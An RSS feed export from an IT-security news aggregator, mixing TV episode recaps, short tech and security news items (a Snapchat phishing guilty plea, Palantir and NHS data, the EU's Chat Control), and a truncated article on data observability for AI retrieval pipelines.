<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=fears+conspiracy+epsteinmossad+coincidence%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 28 Jul 2026 12:24:05 +0200</lastBuildDate>
<pubDate>Tue, 28 Jul 2026 12:24:05 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=fears+conspiracy+epsteinmossad+coincidence%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=fears+conspiracy+epsteinmossad+coincidence%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Agent Kim Reactivated Episode 10 Recap: Ending Explained and Season 2 Setup]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 10 brings the first season to a tense close as Manager Kim fights for Min-ji’s future while South Korean intelligence officials pull him into another dangerous mission. The finale delivers action, emotional reunions, political betrayal, and a cliffhanger that leaves ...]]></description>
<link>https://tsecurity.de/de/3694687/ios-mac-os/agent-kim-reactivated-episode-10-recap-ending-explained-and-season-2-setup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694687/ios-mac-os/agent-kim-reactivated-episode-10-recap-ending-explained-and-season-2-setup/</guid>
<pubDate>Sat, 25 Jul 2026 19:47:47 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 10 brings the first season to a tense close as Manager Kim fights for Min-ji’s future while South Korean intelligence officials pull him into another dangerous mission. The finale delivers action, emotional reunions, political betrayal, and a cliffhanger that leaves Kim’s promised freedom uncertain.




Release date: July 25, 2026



Streaming platform: Netflix



Genre: Action, crime, espionage thriller




The series follows Manager Kim, an ordinary office worker and single father who previously served as a highly trained black-ops agent. His hidden life returns after his daughter, Min-ji, disappears, forcing him to reconnect with former operatives Han-soo and Jin-cheol.



Spoilers ahead for Agent Kim Reactivated Episode 10



The finale begins with Kim trapped and repeatedly questioned about his activities in South Korea. He remains silent until an interrogator threatens Min-ji, prompting him to attack, break free, and attempt another escape.



Kim soon learns that the imprisonment was part of a loyalty test arranged by South Korean intelligence. Officials want to determine whether he can still follow orders before assigning him another classified operation. They offer Kim and Min-ji new identities and a chance to disappear after he completes one final mission.



Kim agrees, but only after demanding protection for Min-ji and freedom for Han-soo and Jin-cheol. His two friends later wake up after being drugged and abandoned far from home, adding a short comic break after the episode’s intense opening.



Gang-chan prepares another attack



While Kim handles the government’s mission, Ju Gang-chan continues planning revenge. He discovers that Kim and Min-ji have effectively disappeared from official records, which makes them easier targets for anyone operating outside the law.



Gang-chan begins working with political and North Korean contacts, showing that the conspiracy surrounding Kim goes far beyond one personal conflict. His obsession with destroying Kim keeps the threat alive even after several of his earlier plans fail.



Kim eventually reunites with Han-soo and Jin-cheol, but their relief does not last long. Intelligence agents surround their location and announce that Kim’s operation has technically failed. Officials then order Kim and the North Korean Director General to be returned across the border.



Does Manager Kim save Min-ji?



Min-ji remains alive and protected by the end of Episode 10. Kim succeeds in keeping her away from immediate danger, although he does not receive the peaceful life he was promised.



The final scene leaves Kim trapped between two governments, powerful enemies, and possible traitors inside South Korea’s intelligence service. The finale also suggests that someone within the agency has been manipulating events, creating a clear storyline for another season.



Netflix currently describes Agent Kim Reactivated as a limited series, and no official Season 2 renewal has been announced.



Agent Kim Reactivated Episode 10 ends the kidnapping storyline while keeping Kim’s larger battle unfinished. Do you think Kim will uncover the intelligence mole and finally escape with Min-ji? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos]]></title>
<description><![CDATA[An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated ident...]]></description>
<link>https://tsecurity.de/de/3694556/hacking/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694556/hacking/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:46 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated identity theft, wire fraud, computer fraud, conspiracy to commit computer fraud, and […]</p>
<p>The post <a href="https://gbhackers.com/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users/">Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Palantir’s access to identifiable NHS England patient data is ‘dangerous’, MPs say]]></title>
<description><![CDATA[Health service has given US tech firm ‘unlimited access’ to certain data to build integrated platform, according to reportsUK politics live – latest updatesMPs have warned that an NHS decision to grant Palantir access to identifiable patient information in its plan to use AI to improve the health...]]></description>
<link>https://tsecurity.de/de/3694385/it-security-nachrichten/palantirs-access-to-identifiable-nhs-england-patient-data-is-dangerous-mps-say/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694385/it-security-nachrichten/palantirs-access-to-identifiable-nhs-england-patient-data-is-dangerous-mps-say/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Health service has given US tech firm ‘unlimited access’ to certain data to build integrated platform, according to reports</p><ul><li><p><a href="https://www.theguardian.com/politics/live/2026/may/11/keir-starmer-labour-leadership-speech-angela-rayner-wes-streeting-andy-burnham-catherine-west-may-elections-uk-politics-latest-news-updates">UK politics live – latest updates</a></p></li></ul><p>MPs have warned that an NHS decision to grant Palantir access to identifiable patient information in its plan to use AI to improve the health service is “dangerous” and will fuel public fears that data privacy is not being prioritised.</p><p>NHS England has allowed staff from the US tech firm and other contractors to access patient data before it has been pseudonymised, despite internal fears of a “risk of loss of public confidence”, the <a href="https://www.ft.com/content/8ce1b9be-1d51-466b-90de-54bff1a504ca?syn-25a6b1a6=1">Financial Times </a>reported.</p> <a href="https://www.theguardian.com/society/2026/may/11/palantir-access-nhs-england-patient-data">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Sugar’ Season 2, Episode 6 Recap: John Sugar Faces His Darkest Choice Yet]]></title>
<description><![CDATA[Sugar Season 2, Episode 6 pushes John Sugar deeper into a dangerous conspiracy as Vega closes in on Ji Moon and refuses to leave any witnesses behind.




Episode title: “Cautionary Tale”



Release date: July 24, 2026



Genre: Crime drama, mystery, neo-noir and science fiction



Season length:...]]></description>
<link>https://tsecurity.de/de/3692419/ios-mac-os/sugar-season-2-episode-6-recap-john-sugar-faces-his-darkest-choice-yet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692419/ios-mac-os/sugar-season-2-episode-6-recap-john-sugar-faces-his-darkest-choice-yet/</guid>
<pubDate>Fri, 24 Jul 2026 21:47:51 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sugar Season 2, Episode 6 pushes John Sugar deeper into a dangerous conspiracy as Vega closes in on Ji Moon and refuses to leave any witnesses behind.




Episode title: “Cautionary Tale”



Release date: July 24, 2026



Genre: Crime drama, mystery, neo-noir and science fiction



Season length: Eight episodes



Season finale: August 7, 2026




Spoiler warning



The following section contains major spoilers from Sugar Season 2, Episode 6.



Sugar learns the truth about Operation Fire Sale



After hiding Ji Moon in a rehabilitation facility and arranging a fake death certificate, Sugar continues investigating the operation connected to Vega. He discovers that the conspiracy, known as Operation Fire Sale, extends far beyond the local drug trade.



The people behind the scheme plan to flood selected neighborhoods with cheap fentanyl. Once overdose deaths increase, someone inside the city alters the official records, allowing the victims to disappear from government systems. The group can then exploit housing grants and properties connected to those missing residents.



Sugar finally has evidence linking Vega to the operation. However, possessing the evidence does not immediately solve his problem because Vega remains determined to find Ji and silence him permanently.



Who is Peg Rosenthal?



The episode opens with a flashback from 11 years earlier, revealing the identity of the woman who has appeared in Sugar’s visions throughout the season.



Her name was Peg Rosenthal, another member of Sugar’s species who became deeply attached to human life. She enjoyed human food, relationships and money before becoming involved in financial crimes.



Sugar was ordered to collect Peg and send her home. During their journey, she warned him that becoming human was a slippery slope. Peg believed her actions had changed her so much that her people would never accept her again.



When Sugar briefly leaves to buy tissues, Peg covers herself and the vehicle in gasoline before taking her own life. Her death explains Sugar’s fear that his growing connection to humanity will eventually destroy him as well.



Sugar cannot bring himself to kill Vega



Sugar enters Vega’s apartment with a gun and appears ready to end the threat. However, he stops himself before pulling the trigger.



His hesitation becomes even more dangerous when Vega meets him later at the hotel bar. Sugar explains that Ji will remain silent, but Vega refuses to take the risk. He makes it clear that Ji cannot stay alive.



Sugar tells Vega that he had an opportunity to kill him earlier. Vega responds that Sugar should have taken it, leaving the two men heading toward an unavoidable confrontation.



Meanwhile, Sugar and Charlotte become closer, showing how quickly he continues to embrace human emotions and desires. With Ji still in hiding and Vega preparing his next move, Sugar has placed himself in too deep with nowhere safe left to go.



What do you think Sugar will do when Vega finally finds Ji? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Silo’ Season 3, Episode 4 Recap: Bernard’s Return Changes Everything]]></title>
<description><![CDATA[Silo Season 3, Episode 4 takes Juliette deeper into Silo 18 as she escapes another attempt on her life and uncovers a secret that changes everything she thought she knew.



Warning: Major spoilers for Silo Season 3, Episode 4 follow.




Episode title: “Whatever You Do, Don’t Go Home”



Release...]]></description>
<link>https://tsecurity.de/de/3692379/ios-mac-os/silo-season-3-episode-4-recap-bernards-return-changes-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692379/ios-mac-os/silo-season-3-episode-4-recap-bernards-return-changes-everything/</guid>
<pubDate>Fri, 24 Jul 2026 21:28:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3, Episode 4 takes Juliette deeper into Silo 18 as she escapes another attempt on her life and uncovers a secret that changes everything she thought she knew.



Warning: Major spoilers for Silo Season 3, Episode 4 follow.




Episode title: “Whatever You Do, Don’t Go Home”



Release date: July 24, 2026



Genre: Science fiction, drama and mystery



Season length: 10 episodes



Season 3 finale: September 4, 2026




Juliette escapes from Medical



The episode begins with Camille still determined to kill Juliette under the Algorithm’s instructions. Sims offers to handle the situation, although his true intentions remain difficult to understand.



Amy, the nurse caring for Juliette, turns against Camille’s plan. She sedates Emerson instead and helps Juliette escape from Medical. Amy also reveals that she had secretly replaced Juliette’s memory-suppressing medication before Juliette stopped taking the pills herself.



Amy allows the Raiders to capture her so Juliette can get away. Shirley later helps Juliette escape from Sims, believing that he plans to hurt her. However, his actions suggest that he may have been quietly helping Juliette all along.



Juliette discovers Bernard alive



Juliette asks Shirley to take her toward the sealed Digger Void. They discover that the entrance is not completely closed, allowing Juliette to continue down into a hidden section beneath the silo.



At the bottom, Juliette finds a small living area containing Bernard Holland. He is alive, heavily scarred and almost unrecognizable after the fire that supposedly killed him.



Sims previously claimed that Bernard had died and that his body had been destroyed. Bernard’s survival now raises major questions about Sims, Camille and the power struggle inside Silo 18. It also gives Juliette someone who understands the secrets behind the Algorithm and the larger silo system.



Billings investigates Orla’s murder



Elsewhere, Billings continues investigating Orla Kent’s death. He learns that rat poison did not kill her. Someone struck her with a piece of metal before hiding her body inside a closed tunnel.



Carla also disappears before she can meet Billings, while Mike and Glenda become possible suspects. The growing number of missing people suggests that someone is removing anyone connected to the silo’s hidden areas.



Daniel and Helen follow the conspiracy



In the earlier timeline, Daniel and Helen hide after discovering Steve’s damaged base and disappearance. Their only lead comes from a strange chess username that may contain a coded message.



Daniel contacts a Pentagon connection named Sam, while a government fixer pressures Helen to stop investigating. Sam eventually discovers something important, sending Daniel and Helen back into the conspiracy just before the episode ends.



Episode 4 leaves Juliette standing before one of the season’s biggest surprises. Bernard’s return can expose what Sims has been planning and reveal why Juliette’s memories were removed. What do you think Bernard will tell Juliette, and can she trust him after everything he did in previous seasons? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos]]></title>
<description><![CDATA[An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated ident...]]></description>
<link>https://tsecurity.de/de/3691635/it-security-nachrichten/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691635/it-security-nachrichten/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</guid>
<pubDate>Fri, 24 Jul 2026 15:11:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated identity theft, wire fraud, computer fraud, conspiracy to commit computer fraud, and […]</p>
<p>The post <a href="https://gbhackers.com/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users/">Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Space datacenters proposed by Musk and Bezos ‘catastrophic’ for planet, experts warn]]></title>
<description><![CDATA[New US petition demands review of plans from tech companies amid fears of environmental destructionSpace datacenters proposed by SpaceX, Jeff Bezos’s Blue Origin and others would release staggering levels of pollution that would probably alter the Earth’s atmosphere and be “catastrophic” for the ...]]></description>
<link>https://tsecurity.de/de/3691115/it-nachrichten/space-datacenters-proposed-by-musk-and-bezos-catastrophic-for-planet-experts-warn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691115/it-nachrichten/space-datacenters-proposed-by-musk-and-bezos-catastrophic-for-planet-experts-warn/</guid>
<pubDate>Fri, 24 Jul 2026 11:26:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New US petition demands review of plans from tech companies amid fears of environmental destruction</p><p>Space datacenters proposed by <a href="https://www.theguardian.com/science/spacex">SpaceX</a>, Jeff Bezos’s <a href="https://www.theguardian.com/science/blue-origin">Blue Origin</a> and others would release staggering levels of pollution that would probably alter the Earth’s atmosphere and be “catastrophic” for the planet, space industry experts and environmental groups warn in a <a href="https://earthjustice.org/wp-content/uploads/2026/07/2026.07.08-petition-for-programmatic-eis.pdf">new petition</a> demanding a review of their impacts.</p><p>Tech companies have collectively proposed millions of “orbital datacenters” and are pressing forward with plans, which require Federal Communications Commission (FCC) approval. Among other issues, pollution from satellites and rockets burning up upon re-entry appears to be <a href="https://www.theguardian.com/us-news/2025/may/07/space-pollution-elon-musk">accumulating in the stratosphere</a> at alarming levels. The spacecraft release black soot, rare metals, aluminum oxides and other pollutants with unknown effects.</p> <a href="https://www.theguardian.com/science/2026/jul/23/space-datacenters-bezos-blue-origin">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Universities drop AI detection tools over fears about accuracy]]></title>
<description><![CDATA[Some institutions are overhauling assessment and trying to move away from the emphasis on surveillance]]></description>
<link>https://tsecurity.de/de/3690636/ai-nachrichten/universities-drop-ai-detection-tools-over-fears-about-accuracy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690636/ai-nachrichten/universities-drop-ai-detection-tools-over-fears-about-accuracy/</guid>
<pubDate>Fri, 24 Jul 2026 05:48:55 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Some institutions are overhauling assessment and trying to move away from the emphasis on surveillance]]></content:encoded>
</item>
<item>
<title><![CDATA[AI in Education]]></title>
<description><![CDATA[Educators and students find themselves on the front line as AI labs begin to muscle in, fears about cognitive atrophy surface, and AI cheating detection tools are revealed to be faulty. It is time to arm students with ‘eval’ powers, a professor argues]]></description>
<link>https://tsecurity.de/de/3690629/ai-nachrichten/ai-in-education/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690629/ai-nachrichten/ai-in-education/</guid>
<pubDate>Fri, 24 Jul 2026 05:48:30 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Educators and students find themselves on the front line as AI labs begin to muscle in, fears about cognitive atrophy surface, and AI cheating detection tools are revealed to be faulty. It is time to arm students with ‘eval’ powers, a professor argues]]></content:encoded>
</item>
<item>
<title><![CDATA[I asked a disaster survival psychologist if AI usage should be the same level of 'emergency' as Pompeii — but instead she's worried about a technology catastrophe that I didn't even consider]]></title>
<description><![CDATA[It's not every day you get to talk to a survival psychologist in a hit National Geographic documentary about your technology fears — but how worried should we be by the rise of AI?]]></description>
<link>https://tsecurity.de/de/3689913/it-nachrichten/i-asked-a-disaster-survival-psychologist-if-ai-usage-should-be-the-same-level-of-emergency-as-pompeii-but-instead-shes-worried-about-a-technology-catastrophe-that-i-didnt-even-consider/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689913/it-nachrichten/i-asked-a-disaster-survival-psychologist-if-ai-usage-should-be-the-same-level-of-emergency-as-pompeii-but-instead-shes-worried-about-a-technology-catastrophe-that-i-didnt-even-consider/</guid>
<pubDate>Thu, 23 Jul 2026 20:06:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's not every day you get to talk to a survival psychologist in a hit National Geographic documentary about your technology fears — but how worried should we be by the rise of AI?]]></content:encoded>
</item>
<item>
<title><![CDATA[EU’s ‘Chat Control 1.0’ Revived, Rekindling Privacy and Surveillance Fears]]></title>
<description><![CDATA[  The European Union has reignited a fierce debate over privacy and surveillance with the revival of its so‑called “Chat Control 1.0” framework. The measure restores a legal basis for major technology companies to voluntarily scan users’ private communications for…
Read more →
The post EU’s ‘Chat...]]></description>
<link>https://tsecurity.de/de/3689706/it-security-nachrichten/eus-chat-control-10-revived-rekindling-privacy-and-surveillance-fears/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689706/it-security-nachrichten/eus-chat-control-10-revived-rekindling-privacy-and-surveillance-fears/</guid>
<pubDate>Thu, 23 Jul 2026 18:43:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>  The European Union has reignited a fierce debate over privacy and surveillance with the revival of its so‑called “Chat Control 1.0” framework. The measure restores a legal basis for major technology companies to voluntarily scan users’ private communications for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/eus-chat-control-1-0-revived-rekindling-privacy-and-surveillance-fears/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/eus-chat-control-1-0-revived-rekindling-privacy-and-surveillance-fears/">EU’s ‘Chat Control 1.0’ Revived, Rekindling Privacy and Surveillance Fears</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple's foldable iPhone launch in question amid production hiccups]]></title>
<description><![CDATA[As the expected launch of Apple's first foldable iPhone nears, the shipment dates are still up in the air, with supply chain sources saying some plans need to be finalized before full mass production can begin.The iPhone Ultra's launch window could be anyone's guess at this pointApple's plans for...]]></description>
<link>https://tsecurity.de/de/3689159/ios-mac-os/apples-foldable-iphone-launch-in-question-amid-production-hiccups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689159/ios-mac-os/apples-foldable-iphone-launch-in-question-amid-production-hiccups/</guid>
<pubDate>Thu, 23 Jul 2026 15:17:32 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As the expected launch of Apple's first foldable <a href="https://appleinsider.com/inside/iphone" title="iPhone" data-kpt="1">iPhone</a> nears, the shipment dates are still up in the air, with supply chain sources saying some plans need to be finalized before full mass production can begin.<br><br><img src="https://photos5.appleinsider.com/gallery/68045-143446-67320-141847-iphonefoldrenderapril20262-xl-xl.jpg" alt="Foldable smartphone standing in a V shape displaying a colorful mountain landscape, beside a small succulent plant and a glowing cat-shaped night light on a tidy desk" height="738" class=""><div><span>The iPhone Ultra's launch window could be anyone's guess at this point</span></div><br>Apple's plans for the iPhone Ultra have been a hot-button topic in recent months. Just days ago, it was reported that Apple had <a href="https://appleinsider.com/articles/26/07/16/mass-production-of-folding-iphone-vapor-cooling-system-has-begun">increased its orders</a> for the vapor cooling system that would be used in its debut foldable.<br><br>Despite that news, rumors of a <a href="https://appleinsider.com/articles/26/05/18/problematic-hinge-could-delay-the-iphone-fold">potential delay</a> have been commonplace. More recently, a report from July 2026 sought to <a href="https://appleinsider.com/articles/26/07/08/iphone-fold-delay-rumor-flip-flop-continues-new-leak-says-everything-is-on-time">ease fears</a> that Apple would miss its fall release window.<br><br>Now, a <em>DigiTimes</em> <a href="https://www.digitimes.com/news/a20260723PD226/apple-foldable-iphone-production-market.html">report</a> claims that the iPhone Ultra's launch is once more in question, with assembler Foxconn still making "adjustments" to its mass production plans.<br><br><br> <strong>Rumor Score:</strong> 🤔 Possible <br><br><br> <a href="https://appleinsider.com/articles/26/07/23/apples-foldable-iphone-launch-in-question-amid-production-hiccups?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245033?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[What should trade unions do about AI?]]></title>
<description><![CDATA[Labour organisations are uniting over fears about the possible displacement of workers]]></description>
<link>https://tsecurity.de/de/3689058/ai-nachrichten/what-should-trade-unions-do-about-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689058/ai-nachrichten/what-should-trade-unions-do-about-ai/</guid>
<pubDate>Thu, 23 Jul 2026 14:36:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Labour organisations are uniting over fears about the possible displacement of workers]]></content:encoded>
</item>
<item>
<title><![CDATA[AI agents aren't confidently wrong because of bad context — they're wrong because of bad data engineering]]></title>
<description><![CDATA[You spend weeks tuning an AI chatbot. Answers are accurate. Stakeholders sign off, and you ship it. Three months later, the system is confidently wrong about a third of what users ask. Nobody changed the model, and nobody touched the prompts. The world moved, pricing changed, a policy updated, a ...]]></description>
<link>https://tsecurity.de/de/3687580/it-nachrichten/ai-agents-arent-confidently-wrong-because-of-bad-context-theyre-wrong-because-of-bad-data-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687580/it-nachrichten/ai-agents-arent-confidently-wrong-because-of-bad-context-theyre-wrong-because-of-bad-data-engineering/</guid>
<pubDate>Wed, 22 Jul 2026 22:58:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>You spend weeks tuning an AI chatbot. Answers are accurate. Stakeholders sign off, and you ship it. Three months later, the system is confidently wrong about a third of what users ask. Nobody changed the model, and nobody touched the prompts. The world moved, pricing changed, a policy updated, a product spec shipped a new version, and the underlying knowledge store didn't move with it.</p><p>This is not a hypothetical. It's one of the most common production failure modes in enterprise AI right now, and most data engineering teams don't have the right tooling to catch it, regardless of how the AI system retrieves the data.</p><h2>The failure that doesn't look like a failure </h2><p>An AI application doesn't care whether it's retrieving from a vector store, a document index, or an API call. Whatever the mechanism, nothing in a standard retrieval pipeline checks whether what it's serving is still correct. A stale pricing document retrieves just as confidently as a current one, because the system is scoring relevance or availability, not correctness. A record with a silently missing field passes through just as cleanly as a complete one, for the same reason.</p><p>So the failure is invisible by design. Outdated or incomplete data still scores high on relevance, or passes every check a data pipeline was built to run. The model answers with full confidence because the retrieved context looks authoritative. Every dashboard you're watching stays green. The system looks like it's working. It's just wrong.</p><p>I’ve watched a similar version of this happen outside the AI context, in a fintech pipeline. An upstream system changed a field without notifying downstream users. The pipeline did not fail; it simply propagated bad values into dashboards because the system only checked whether the job completed, not whether the data was still correct. The issue surfaced only when a customer noticed something inconsistent. By then, the bad data had already moved downstream. </p><p>Whether it's a document that's gone stale or a field that's gone silently missing, the failure shape is the same: the absence of an error is not the presence of correctness, and without building proper validation layers, nothing in the pipeline could identify the problem.</p><h2>Why this is a data engineering problem</h2><p>Teams that hit this failure tend to misdiagnose it, and they tend to do it twice.</p><p><b>Blaming the model: </b>The first instinct is to blame the model, try a different LLM, adjust the prompt. The real problem lies further upstream, at the data engineering layer, the same instinct behind the fintech failure above: monitoring built for the pipeline, not the data.</p><p><b>Blaming the retrieval layer: </b>Once the model's ruled out, the next instinct is to blame the retrieval or context layer instead and buy a better one. The timing isn't a coincidence: as enterprises push these systems into the real production world, this gap is exactly what's starting to surface, and the vendor response has been everywhere. </p><ul><li><p>AWS just<a href="https://venturebeat.com/data/aws-enters-the-context-layer-race-with-a-graph-that-learns-from-agents-not-manual-curation"> entered the "context layer" race</a> with a knowledge graph that learns from agent usage. </p></li><li><p>Snowflake's new Horizon Context and Cortex Sense target the exact symptom<a href="https://venturebeat.com/data/ai-agents-keep-giving-confident-wrong-answers-the-context-layer-is-enterprise-ais-next-production-problem"> this piece opened with</a>: agents giving confident wrong answers because nothing governs the business logic underneath them. </p></li></ul><p>Both are real responses to a real problem, but they sit one layer above it; a knowledge graph still depends on whatever feeds it.</p><p>The real problem lies further upstream, at the data engineering layer. Teams check whether a job ran, not whether the data it moved is still true, an instinct that predates AI by years. Monitoring is built for the pipeline, not for the data. </p><h2>What's actually missing: Data observability</h2><p>Data observability is a well-known concept that doesn't get enough attention in how it's actually implemented. The relevant metric isn't a percentage — it's coverage: what fraction of critical datasets have lineage that's actually queryable, versus only living in someone's head.</p><p>Uber built a <a href="https://www.uber.com/in/en/blog/operational-excellence-data-quality/">dedicated data quality and observability platform</a> long before retrieval-augmented generation existed. Their Unified Data Quality platform supports more than 2,000 critical datasets and detects around 90% of data quality incidents before they reach downstream consumers.</p><p>Netflix solved a different piece of the same problem, <a href="https://netflixtechblog.com/building-and-scaling-data-lineage-at-netflix-to-improve-data-infrastructure-reliability-and-1a52526a7977">building a company-wide data lineage system</a> so anyone could answer where a dataset came from and what touched it along the way. It maps dependencies across Kafka topics, ML models, and experimentation, not just warehouse tables. Similar to Uber, the platform was built for humans and now it has become more important with the rise in AI/LLM applications.</p><p>Between them, Uber and Netflix cover two of the four things worth building for. In practice, I think about it as four dimensions, each measurable on its own terms.</p><p><b>Correctness:</b> Does each record conform to the shape and rules it's supposed to, right field types, no unexpected nulls, values in range. Tools like<a href="https://greatexpectations.io/"> Great Expectations</a> and <a href="https://soda.io/">Soda</a> handle this well: automated row and column-level validation instead of manual checks after something breaks. Track percentage of records passing validation per run.</p><p><b>Freshness:</b> Is the data still current relative to its source, not just current as of its last check. Track time since last successful update per source, with an SLA per dataset rather than one blanket threshold, since some sources need hourly refresh and others don't.</p><p><b>Consistency:</b> Does the same fact read the same way everywhere it's stored or indexed. This fails silently, it only shows up when two systems fed by the same source start disagreeing. A periodic cross-check between downstream destinations, flagging mismatch rate above a threshold, is enough to catch it early.</p><p><b>Lineage:</b> Can you trace any output back to its source and every transform it passed through, the same question Netflix built its system to answer. </p><p>None of this requires infrastructure most data teams don't already have. I know because I've built it, not just argued for it.</p><p>At <a href="https://www.socure.com/">Socure</a>, client data arrived in whatever shape the client felt like sending it, and occasionally, quietly wrong. The challenge was building a system where incorrect data could be identified before it propagated downstream. The same principles applied: Validate what arrived, understand where it came from, and prevent bad data from becoming someone else's problem.</p><p>Great Expectations became part of that foundation: schema and range validation at ingestion, per-source SLAs for freshness, cross-system checks for consistency, and file-level lineage. All of it sat behind a <a href="https://aws.amazon.com/blogs/big-data/build-write-audit-publish-pattern-with-apache-iceberg-branching-and-aws-glue-data-quality/">write-audit-publish</a> pattern, where data landed in staging, was validated, and only moved downstream if it passed the required 